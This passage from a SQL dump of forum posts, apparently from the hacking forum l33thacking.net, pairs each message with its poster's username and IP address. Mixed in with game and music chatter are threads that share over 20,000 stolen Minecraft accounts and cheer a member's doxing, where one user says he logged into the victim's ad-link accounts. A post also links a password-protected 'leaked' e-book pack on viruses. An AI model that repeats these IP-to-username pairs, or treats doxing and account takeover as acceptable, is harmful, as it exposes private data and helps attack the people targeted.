They just recently got it.\r\n[/quote]\r\n\r\nyou mean LF and not LH?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1eeb2a3031726fdf0aedb1f1b3eee461', '0', '0'); INSERT INTO mybb_posts VALUES('6290', '532', '2668', '23', 'RE: Think you have an infection? Click Here.', '0', '62', 'R?????zo?', '1351112848', 'Bookmarked, I will try this.\nI think I\'m infected tbh :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '118b027ca1560e975262ed4426385d84', '0', '0'); INSERT INTO mybb_posts VALUES('6291', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '62', 'R?????zo?', '1351112882', 'Thanks for this, looks awesome, I will give it a try.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3a21c096d01cddce126c33d2774fd061', '0', '0'); INSERT INTO mybb_posts VALUES('6292', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '62', 'R?????zo?', '1351113015', 'pretty much all day at work, and sometime when I get home.\nthat\'s like 12hours a day.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f5d2668587388f19337af051f0db895e', '0', '0'); INSERT INTO mybb_posts VALUES('6293', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '62', 'R?????zo?', '1351113091', 'yeah welcome to the group <3\nI shall post some new content.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e44a872368e2ccd7ed5fc03c466c8999', '0', '0'); INSERT INTO mybb_posts VALUES('6294', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '82', 'iTzIpod', '1351118230', 'Lol I swear 70% of the accounts there are taken.\nI know which forum you got the accounts from. And that forum has it\'s own Minecraft Account Checker. And a lot of users have it. So they probably took most of the accounts on here.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3507347c8ac7cf19af288c31fe94aaf7', '0', '0'); INSERT INTO mybb_posts VALUES('6295', '1082', '6287', '74', 'RE: WarZ', '0', '82', 'iTzIpod', '1351118271', 'Pssh.\nI play MineZ on Minecraft. (It\'s a server) :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1af47f45a8ca6f19a9350f4e052dc077', '0', '0'); INSERT INTO mybb_posts VALUES('6296', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '82', 'iTzIpod', '1351118366', 'It auto corrects L/F to LH.\n\nI meant to say LeakForums.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4a0e127825ce30b9bac46c790ae2af6', '0', '0'); INSERT INTO mybb_posts VALUES('6297', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '82', 'iTzIpod', '1351118410', 'Nevermind. Just downloaded it, scanned with MalwareBytes, and got no malicious items.\nThanks! :D\nInstalled all of them.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e84332f1fd453851cc77af60999e0066', '0', '0'); INSERT INTO mybb_posts VALUES('6298', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1351118458', 'I haven\'t posted any content in a while.. :/ Sorry for that. I\'m kinda busy these days.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3a7be8a99514b56e5547f398bc90b2ed', '0', '0'); INSERT INTO mybb_posts VALUES('6299', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '62', 'R?????zo?', '1351122047', 'yeah it auto corrects lol\ni\'ve seen this plugin before on ewhore.pro', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '42bf65632e64cf9e6d8b1dde4183ad6e', '0', '0'); INSERT INTO mybb_posts VALUES('6300', '1083', '0', '4', 'Hey Guys', '0', '160', 'Jacob', '1351125122', 'I decided to make my Introduction thread, and here it is.\r\n\r\nI am an admin on MyBBSource, and an upgraded member on FK. I am also a moderater on NC.\r\n\r\nHello, I joined a while ago, but I thought I would like to make my introduction thread.', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '966a51e91c13effbd25b00b4f8b3bd6e', '0', '0'); INSERT INTO mybb_posts VALUES('6301', '1083', '6300', '4', 'RE: Hey Guys', '0', '82', 'iTzIpod', '1351125225', 'You haven\'t been active.\nBut welcome back :)\nEnjoy your stay. Please be active on the forum.\nHope you can probably try to advertise LH on other forums?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f4ae25adbff23056383ac7d546aa8d26', '0', '0'); INSERT INTO mybb_posts VALUES('6302', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '160', 'Jacob', '1351125233', 'I dare you to try them :P\n\nBut no, they cant change the pass because its already migrated, and you need to answer a security question answer to be able to change it.', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '835d5bb837e6f76f172cee1f696231dc', '0', '0'); INSERT INTO mybb_posts VALUES('6303', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '82', 'iTzIpod', '1351125296', 'Actually, there was a way to bypass that. But I\'m not sure if Mojang fixed it or not.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3299b795de4f25368748722df0dcec2b', '0', '0'); INSERT INTO mybb_posts VALUES('6304', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '2', 'Apathy', '1351127862', 'Nice share. Thanks man. :)', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '7e8453110ac390f3ea0eb32e764d4f3f', '0', '0'); INSERT INTO mybb_posts VALUES('6305', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '222', 'Exposé', '1351130416', 'Lol yeh....and idk I think jok3r wanted it and it was a test for a member on NSA... :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '387cdb2d84d9014c975ccefcaf8ac5cf', '0', '0'); INSERT INTO mybb_posts VALUES('6306', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '257', 'XxTREYZxX', '1351130483', 'nice share but i will not be needing this :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'e820cb95cdc8acad259a96ac21f506aa', '0', '0'); INSERT INTO mybb_posts VALUES('6307', '976', '5459', '71', 'RE: Halo 4', '0', '291', 'xXGANNONXx', '1351130560', 'looks really good cant wait to buy it', '203.104.11.14', '-882373874', '0', '0', '0', '0', '1', '7901f93bdb4d0456020c0f2953ebd013', '0', '0'); INSERT INTO mybb_posts VALUES('6308', '976', '5459', '71', 'RE: Halo 4', '0', '257', 'XxTREYZxX', '1351130681', 'yeah same i think its going to be great !', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '9b8e51b711fbd31eea59380be95a498c', '0', '0'); INSERT INTO mybb_posts VALUES('6309', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '291', 'xXGANNONXx', '1351130714', 'thanks for this its awesome :)', '203.104.11.14', '-882373874', '0', '0', '0', '0', '1', 'd0f2d69f1cd4c743688c4a2b6e2e9514', '0', '0'); INSERT INTO mybb_posts VALUES('6310', '1083', '6300', '4', 'RE: Hey Guys', '0', '257', 'XxTREYZxX', '1351130922', 'Yeah please be active mate :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '11ead7e645734e5eb70496d2f0ec80f4', '0', '0'); INSERT INTO mybb_posts VALUES('6311', '1084', '0', '4', 'hey guys', '0', '291', 'xXGANNONXx', '1351131193', 'hey guys im new to l33thacking.net \r\nill will enjoy my stay', '203.104.11.14', '-882373874', '0', '0', '0', '0', '1', '8a566544237fff594f14229677bb512a', '0', '0'); INSERT INTO mybb_posts VALUES('6312', '1084', '6311', '4', 'RE: hey guys', '0', '257', 'XxTREYZxX', '1351131260', 'Sup my fellow friend whats happening bro,\nenjoy your stay mate :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'ec30666a47eec0e9cfea515cba8b8f04', '0', '0'); INSERT INTO mybb_posts VALUES('6313', '1085', '0', '71', '(help)optifine for minecraft', '0', '291', 'xXGANNONXx', '1351131536', 'hey LH,\r\ndoes anyone no a good website to get optifine from?', '203.104.11.14', '-882373874', '0', '0', '0', '0', '1', '0bce21c1d553d6985ae533037a0bb8a2', '0', '0'); INSERT INTO mybb_posts VALUES('6314', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '61', 'NXK', '1351132102', 'It\'s legit, Good job NSA!', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '67a2e014dce7087a1d406bba9bbd57b6', '0', '0'); INSERT INTO mybb_posts VALUES('6315', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '2', 'Apathy', '1351132138', 'Hmm nice job but that is not nice for him. :P', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '3e3af4e62c32f825a6b1480e0ec626e0', '0', '0'); INSERT INTO mybb_posts VALUES('6316', '1086', '0', '75', 'Skyrim Cheats and tips', '0', '291', 'xXGANNONXx', '1351132358', '[color=#1E90FF][/color]hey LH, just giving you some tips and cheats to make your gaming experience more fun\r\n\r\nInfinite skill level gain\r\nThis trick requires that you own a house with an alchemy lab. Obtain the Oghma Infinium book, but do not read it. Go to your house, and open the bookshelf. Read the Oghma Infinium book, then select the skill set to assign the skill gain. Close the book, but not the bookshelf. Store the book on the shelf, then take the book back off the shelf, and select it, but do not read it. Repeat this as many times as desired to get as much skill level gain as desired\r\n\r\nDuplicating apparel items\r\nPlace any apparel item (armour or jewellery for best results) on a mannequin. Then, put the item back into your inventory. Leave the location of the mannequin, and go to a different area (for example, exit a house), then return to the mannequin to find the item still on the mannequin, which you can then take. Repeat this as many times as desired.\r\n\r\nEasy gold and Alchemy and Speech skills\r\nThis trick requires some time to set up, but once it is done, you can get as much gold as desired. It requires the following:\r\n\r\n1. Fortify Alchemy Enchantment\r\n2. Helmet, gloves/bracers, two rings, and a necklace\r\n3. Five Grand Soul Gems filled with Grand Souls. Grand Souls can be taken from Mammoths or bought.\r\n4. The ingredients for Fortify Restoration potions: Abecean Longfins, Cyrodilic Spadetails, and Salt Piles. The fish can be obtained easily by swimming around Goldenglow Estate near Riften. Collect as many of these as you can, at least ten to fifteen of each ingredient.\r\n5. Ingredients for a Fortify Enchanting potion: Snowberries, Spriggan Sap, Hagraven Claw, and Blue Butterfly Wing.\r\n\r\nhope you enjoy these tips and cheats :)', '203.104.11.14', '-882373874', '0', '0', '291', '1351132394', '1', '692dcff4509eefe23c67bff408483865', '0', '1351132394'); INSERT INTO mybb_posts VALUES('6317', '1086', '6316', '75', 'RE: Skyrim Cheats and tips', '0', '257', 'XxTREYZxX', '1351132446', 'Thanks mate for the great tips,\nnice and HQ', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '3bb8b434ad3bbef2b74fb7b58861a7dc', '0', '0'); INSERT INTO mybb_posts VALUES('6318', '1085', '6313', '71', 'RE: (help)optifine for minecraft', '0', '257', 'XxTREYZxX', '1351132483', 'Sorry mate i dont know much about optifine sorry :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'd032e539a1787de2f84c37085bb8a4aa', '0', '0'); INSERT INTO mybb_posts VALUES('6319', '1078', '6276', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '1', 't3h jok3r', '1351132658', '[quote=\'iTzIpod\' pid=\'6276\' dateline=\'1351107524\']\r\nChecked it out.\r\nGood job NSA! :)\r\n\r\nWhy did you guys dox him though? He\'s a member of LH isn\'t he?\r\n\r\nAlso, I checked his Adf.ly Account and the password was changed. Someone probably changed it due to his earnings or so.\r\nBut I checked his Adfoc.us Account and it worked. But the earnings are meh.\r\n\r\n$0.00052 or something. Lol.\r\n[/quote]\r\n\r\nYup he is a member but he leeched like 90% of L33T Hackings tutorials and programs and gave them out on Leakforums with his own credits and yes I mean credits= Kasual/Rave. NSA needed a test member so I said do it on him because he was not loyal, I requested him to take it down but refused and started spreading the leeched stuff on other sites so I thought NSA that he is a true scumbag.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ef9f31f26555bf7c116d2327a94efdf4', '0', '0'); INSERT INTO mybb_posts VALUES('6320', '1083', '6300', '4', 'RE: Hey Guys', '0', '291', 'xXGANNONXx', '1351132695', 'hello bud, im new to :O\nhope you enjoy your stay :)', '203.104.11.14', '-882373874', '0', '0', '0', '0', '1', '7b9b40e4de0bd70e584236f8bede1952', '0', '0'); INSERT INTO mybb_posts VALUES('6321', '1083', '6300', '4', 'RE: Hey Guys', '0', '1', 't3h jok3r', '1351132934', 'Welcome back jacob. Hope you are active.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ce5a3482e5b3af17026c4c75b70aa40e', '0', '0'); INSERT INTO mybb_posts VALUES('6322', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '222', 'Exposé', '1351133042', 'Yeh he deserved to be dox...luckily I had bee remove the details for an assload of his accounts. This is what happens when your an asshole online..', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'c2b8eb6df47e6e983a226bef3540fbaf', '0', '0'); INSERT INTO mybb_posts VALUES('6323', '1087', '0', '74', 'GEARS OF WAR :P', '0', '257', 'XxTREYZxX', '1351133051', 'hey LH,\r\ngears of war :P\r\n\r\n[color=#DAA520] Do you play gears of war 3?\r\n\r\n\r\n Yes no\r\n\r\n2. How often do you play it?\r\n\r\nOnce a week every couple of months\r\n \r\nA few times a week Most days’\r\n\r\nEvery day I’ve played it a few times\r\n\r\n3. What is your age?\r\n\r\n10-15 years\r\n15-20 years\r\nAbove 20 years\r\n\r\n4. What is your gender?\r\n\r\nMale female\r\n\r\n5. What ethnicity are you?\r\n\r\n………………………………………………………\r\n\r\n6. Did you play the previous gears of wars?\r\n\r\nYes no\r\n\r\n\r\n\r\n\r\n\r\n7. What is your favorite game mode?\r\n\r\nCampaign horde mode\r\n\r\nBeast mode online versus\r\n\r\n\r\n8. What do you like about this particular game mode?\r\n\r\n…………………………………………………………………………………..\r\n\r\n9. What level are you online?\r\n\r\n0-20\r\n21-40\r\n41-60\r\n61-80\r\n81-100\r\nPrestige\r\n\r\n10. If you could improve any part of the game what would it be?\r\n\r\nhope you enjoyed the test [/color]', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '146c83e083977824222e8f880009ae6a', '0', '0'); INSERT INTO mybb_posts VALUES('6324', '1083', '6300', '4', 'RE: Hey Guys', '0', '222', 'Exposé', '1351133217', 'Welcome Jacob to l33thacking. I hope you can be active and post some HQ content', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '2a5fe738dd032295c716a6d01abcb7c0', '0', '0'); INSERT INTO mybb_posts VALUES('6325', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '1', 't3h jok3r', '1351134022', 'New group added.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '20783203f7abd124523adc93cb442670', '0', '0'); INSERT INTO mybb_posts VALUES('6327', '1088', '0', '49', 'Best unique and useful suggestion', '0', '5', 'Timmy', '1351137172', 'Lets have a subforum inthe off topic section called misc tutorials. People will post tutorials on shit not covered on LH such as how to look good, how to bag whores, learning their laws, how to talk to a specific person, what to do when in trouble, how a car functions etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ab43ba8fbf5cfce474c0d9aa7f18d087', '0', '0'); INSERT INTO mybb_posts VALUES('6328', '1089', '0', '42', 'Homeless man saves officer from getting his ass whopped', '0', '5', 'Timmy', '1351137461', 'Video: http://news.yahoo.com/video/exclusive-homeless-man-saves-police-032800416.html\r\n\r\nHomeless man saves a officer in dallas from getting beaten up.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '16adb660b6591ccf29c2aec94d94a6a5', '0', '0'); INSERT INTO mybb_posts VALUES('6329', '1090', '0', '8', 'What is this song called?', '0', '5', 'Timmy', '1351137598', 'There\'s a song in which people keep repeating the word \"black\"? I keep hearing some people mocking that song and I\'m curious.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '239e46b4f2770e319104441a73bb1315', '0', '0'); INSERT INTO mybb_posts VALUES('6330', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '7', 'Romdu62', '1351138078', 'I will SE the company :D\n\nYou guys can pick any favorite company for chocolate and another different favorite drinks company. All you have to do is 5 refer people.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a0d97ce541f88d2d2aed0bad5002e96f', '0', '0'); INSERT INTO mybb_posts VALUES('6331', '1058', '6090', '24', 'RE: Microsoft or Apple', '0', '7', 'Romdu62', '1351138173', 'Microfost for the win but they have weak security.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '479b3d23486819ee783c41ee94648039', '0', '0'); INSERT INTO mybb_posts VALUES('6332', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '222', 'Exposé', '1351139071', 'Not a bad suggestion.. I like it :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'ee72a2578b3b961ec16543c4cd0d6e26', '0', '0'); INSERT INTO mybb_posts VALUES('6333', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '257', 'XxTREYZxX', '1351142994', 'This a great suggestion.\ni say lets do it.', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '6a080eed37bf0e69238d50a534e9d427', '0', '0'); INSERT INTO mybb_posts VALUES('6334', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '257', 'XxTREYZxX', '1351143111', 'i have referred one so far ; SO YEAH', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '46d5c91d1d52ab3ddf0cb97a317a3703', '0', '0'); INSERT INTO mybb_posts VALUES('6335', '1090', '6329', '8', 'RE: What is this song called?', '0', '257', 'XxTREYZxX', '1351143204', 'I thinks it\'s black and yellow.\nIt goes:black and yellow,black and yellow and so on.', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '2de2f418ddc0dd69452f95b580b2425b', '0', '0'); INSERT INTO mybb_posts VALUES('6336', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '257', 'XxTREYZxX', '1351143276', 'What a brave homeless person :)', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '38d44a4e813d8d0e35b3151e9cd7fc0d', '0', '0'); INSERT INTO mybb_posts VALUES('6337', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '257', 'XxTREYZxX', '1351143441', 'Congratz virtual legend.\nhope you recruit some awesome members\\\ngood luck with recruiting :P\nmaybe me hahaah', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '64341ca3b2e7fd4573e2ae3990b9d232', '0', '0'); INSERT INTO mybb_posts VALUES('6338', '1091', '0', '56', 'Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351143929', 'hello LH,\r\nand the game is rate the avatar above you.', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '92c87150f38d34339976eaf2282aa925', '0', '0'); INSERT INTO mybb_posts VALUES('6339', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '222', 'Exposé', '1351151430', 'It\'s not too bad...kinda boring tho....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '50d4cee72d4fd7ddd51abbaf1dde91a1', '0', '0'); INSERT INTO mybb_posts VALUES('6340', '1092', '0', '82', 'Welcome New Members To The Marketers Palace', '17', '228', 'VirtualLegend', '1351151522', '[align=center][size=medium]Hello New Members of The Marketers Group.\r\n\r\nI just want to welcome all of the new members of the Marketers Group. What i ask of you is to post Good tutorials or Ebooks of money making content. Not only that i want you to help people out that are stuck with a problem or a question. And of course stay active and HQ because all of you are representing the group, so act like active and HQ member.\r\n\r\nAll the Good threads about Monetizing must be posted in this Group.\r\n\r\nHave a Nice Day :P[/size][/align]', '81.18.248.110', '1360197742', '1', '0', '228', '1351367780', '1', 'fabe6492e6feb3e50f1b860b5f3a3a2b', '0', '1351367780'); INSERT INTO mybb_posts VALUES('6341', '1093', '0', '7', 'I\'m back', '0', '257', 'XxTREYZxX', '1351152283', 'hey guys im back, \r\nfor some reason i was banned weird like what happened to virtual legend,\r\ni was worried as,but im back :P', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', '7644cbc7a62f8fc80f02bdd8199662ca', '0', '0'); INSERT INTO mybb_posts VALUES('6342', '1091', '6339', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351152522', '[quote=\'Exposé\' pid=\'6339\' dateline=\'1351151430\']\r\nIt\'s not too bad...kinda boring tho....\r\n[/quote]\r\n\r\nhaha please rate outta /10\r\nthanks ;P\n[hr]\n8/10 CONSIDERING THAT ITS KINDA FUNNY AND ENTERAINING :p', '203.104.11.9', '-882373879', '1', '0', '257', '1351152561', '1', '67a2fa0587c9320af3b6629164888938', '0', '0'); INSERT INTO mybb_posts VALUES('6343', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '62', 'R?????zo?', '1351154741', 'it could be better tbh :P\n3/10', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', 'e5f7e61a4a0c4122010d19cbb96e1315', '0', '0'); INSERT INTO mybb_posts VALUES('6344', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '62', 'R?????zo?', '1351154854', 'could be a great suggestion :)', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', 'bf660fa72e1e55ab94dfa74aae77988a', '0', '0'); INSERT INTO mybb_posts VALUES('6345', '1090', '6329', '8', 'RE: What is this song called?', '0', '62', 'R?????zo?', '1351154966', 'no idea, but you can try http://www.shazam.com/ and whenever you hear that song that will tell you the exact same name :P', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', '5a3ef8e80d1ff61533b189aaf8602224', '0', '0'); INSERT INTO mybb_posts VALUES('6346', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '62', 'R?????zo?', '1351155038', 'kinda nice contest, I will not participate though since I don\'t eat chocolates :P', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', 'e6cad6af6ab05dfda2fa00f426500b8f', '0', '0'); INSERT INTO mybb_posts VALUES('6347', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1351155133', 'you could have changed the userbar already :P', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', '2b2c61cb9316c32a768b4b7754fc0b5f', '0', '0'); INSERT INTO mybb_posts VALUES('6348', '1094', '0', '58', 'The Marketers - Official Recruitment | Join us Today !', '0', '228', 'VirtualLegend', '1351155294', '[size=medium][color=#32CD32]Hello L33thacking Members,[/color]\r\n\r\nToday is the first requitment of the new official group \'Marketers\'.\r\n\r\n[color=#FF0000]Don\'t PM just Post the format below to request your application![/color]\r\n\r\n[color=#32CD32]Requirements:[/color]\r\n\r\n* Must Have Atleast More than 75 Posts\r\n* Must Have Atleast More than 5+ Reputation\r\n* Must Have Experience of Online money making\r\n* Must be a active member with High Quality Posts/Threads\r\n\r\n[color=#32CD32]The Marketers Usberbar (Made by Reloadzor):[/color]\r\n[img]http://i.imgur.com/ifvO7.gif[/img]\r\n\r\n\r\n[color=#32CD32]The Marketers Palace Forum Icon:[/color]\r\n[img]http://i.imgur.com/uP3eg.png[/img]\r\n\r\n[color=#FF0000]Signature: Coming Soon ![/color]\r\n\r\n[u][b]Please Fill In The Application Completely:[/b][/u]\r\n[code][b]Username:[/b]\r\n[b]Age:[/b] \r\n[b]Is your English spelling/grammar good?: [/b]\r\n[b]How many Experience do you have with making money online?:[/b]\r\n[b]What for methods do you use?:[/b]\r\n[b]Do you succeed more than you fail, or not?:[/b]\r\n[b]Explain Why you want to join the group:[/b]\r\n[b]Profile Link:[/b][/code]\r\n\r\n[color=#FFD700]Have a Nice Day :P[/color]\r\n\r\n[/size]', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'bf92269fbf30dac39e71ebfdb8e770e5', '0', '0'); INSERT INTO mybb_posts VALUES('6349', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '228', 'VirtualLegend', '1351155658', 'Lmao Or you could make a LH Group called Womanizer :P', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'f8de707d2e5ac4ca3bbe679e771976d9', '0', '0'); INSERT INTO mybb_posts VALUES('6350', '1093', '6341', '7', 'RE: I\'m back', '0', '222', 'Exposé', '1351155678', 'lol welcome back.... hopefully cloudflare stops actin up', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'de721f7fe830d932a4eaed51b8df10a8', '0', '0'); INSERT INTO mybb_posts VALUES('6351', '1083', '6300', '4', 'RE: Hey Guys', '0', '228', 'VirtualLegend', '1351155909', 'Wassup Jacob, I think you will like it here :P', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'df02dc7026477389caf9a424cad49f24', '0', '0'); INSERT INTO mybb_posts VALUES('6352', '1093', '6341', '7', 'RE: I\'m back', '0', '228', 'VirtualLegend', '1351155988', 'lmao stupid cloudflare', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '83ad8dbc2ce13480894cc3f34dfebf95', '0', '0'); INSERT INTO mybb_posts VALUES('6353', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '228', 'VirtualLegend', '1351156066', 'I have refered two people Yeah', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '1a811b8f98164c37f88512794ffcaba9', '0', '0'); INSERT INTO mybb_posts VALUES('6354', '1095', '0', '8', 'Azz & Tittiez', '0', '228', 'VirtualLegend', '1351156575', '[align=left]The Song is made by The Three 6 Mafia, and it\'s called Azz And Tittiez. The Song is used in the new film \'The Campaign\'. The movie made a f*king Hilarious scene. Go and check it out. You can see the movie on solarmovie.eu IN HD quality.\r\n\r\nSong:\r\n[video=youtube]http://www.youtube.com/watch?v=46CY-QFcxxY[/video][/align]', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'ae6ea133361bd3b887427f9eb4115acf', '0', '0'); INSERT INTO mybb_posts VALUES('6355', '1095', '6354', '8', 'RE: Azz & Tittiez', '0', '257', 'XxTREYZxX', '1351157708', 'Thats a nice song,Thanks for the great share :P', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '2c6fce952248c3bf950549369d0da2f0', '0', '0'); INSERT INTO mybb_posts VALUES('6356', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '257', 'XxTREYZxX', '1351158038', '6/10 considering it is some Asian chick hahah lol', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '5dda804c6fe77c7ba2838e47232ea7c3', '0', '0'); INSERT INTO mybb_posts VALUES('6357', '1096', '0', '7', 'Leaked e-book Pack [Lot\'s of stuff]', '0', '257', 'XxTREYZxX', '1351158423', 'hello this is a leaked e-book pack, It has many ebooks on viruses and ethical hacking.\r\nhere it is: http://j.gs/1720852/ebookpack\r\nthere you go \r\npassword: ebad112', '203.104.11.11', '-882373877', '1', '0', '61', '1351200214', '1', 'ed1bd99a8e63d063624db8dee7601540', '0', '1351200214'); INSERT INTO mybb_posts VALUES('6358', '1097', '0', '9', 'Monetizing e-book', '0', '257', 'XxTREYZxX', '1351158574', 'hey LH this is a e-book leaked by me for neobux 8$ a day.\r\nlink:http://www.filemsg.com/p5pq5xqr657t\r\nhope you enjoy', '203.104.11.11', '-882373877', '1', '0', '0', '0', '1', '338f44ab8262a121ef6859b7c5923e06', '0', '0'); INSERT INTO mybb_posts VALUES('6359', '1096', '6357', '7', 'RE: Leaked e-book', '0', '228', 'VirtualLegend', '1351159532', 'I don\'t know about you, but do you want to download a file without any information. Or virusscan,proof.', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', 'fa3b2564e01bb6417347527dfeb26081', '0', '0'); INSERT INTO mybb_posts VALUES('6360', '1083', '6300', '4', 'RE: Hey Guys', '0', '62', 'R?????zo?', '1351161221', 'Welcome :)\nEnjoy your stay, stay active and HQ.', '89.214.231.50', '1507256114', '1', '0', '0', '0', '1', '0cfe90dfcfc4b8c40b120f36a5f27174', '0', '0'); INSERT INTO mybb_posts VALUES('6361', '1096', '6357', '7', 'RE: Leaked e-book', '0', '205', 'mothered', '1351166044', 'Agree.\r\n\r\nAt least some sort of description, should be posted.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '900b8ed5c41a83fbd90db90a03a45b5e', '0', '0'); INSERT INTO mybb_posts VALUES('6362', '1081', '6284', '43', 'RE: Minecraft Accounts!! Over 20,000!', '0', '228', 'VirtualLegend', '1351166243', 'Nice Share, but there are no accounts working', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '88fd1d8ceed1df922317ed91b001edb8', '0', '0'); INSERT INTO mybb_posts VALUES('6363', '1088', '6327', '49', 'RE: Best unique and useful suggestion', '0', '61', 'NXK', '1351166656', 'I like this idea too, Ill talk to joker about it later today :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'da41f5eec8b3ff6b965be0efd975299b', '0', '0'); INSERT INTO mybb_posts VALUES('6364', '1096', '6357', '7', 'RE: Leaked e-book', '0', '61', 'NXK', '1351166733', '\"Leaked ebook\" \n\nYou need to provide information in the thread. No one knows what he ebook is about.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'fcad1ccd21194543308f40830091a16e', '0', '0'); INSERT INTO mybb_posts VALUES('6365', '613', '6347', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1351167089', '[quote=\'R?????zo?\' pid=\'6347\' dateline=\'1351155133\']\r\nyou could have changed the userbar already :P\r\n[/quote]\r\n\r\nJoker is in charge of groups I\'m not. So when he\'s not busy it will be done.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '2fb5805aa8fe202dc61344ab23d9d338', '0', '0'); INSERT INTO mybb_posts VALUES('6366', '1089', '6328', '42', 'RE: Homeless man saves officer from getting his ass whopped', '0', '205', 'mothered', '1351167482', 'And there\'s so many people who judge the homeless.\r\n\r\nPerhaps they should see this.', '210.50.40.19', '-768464877', 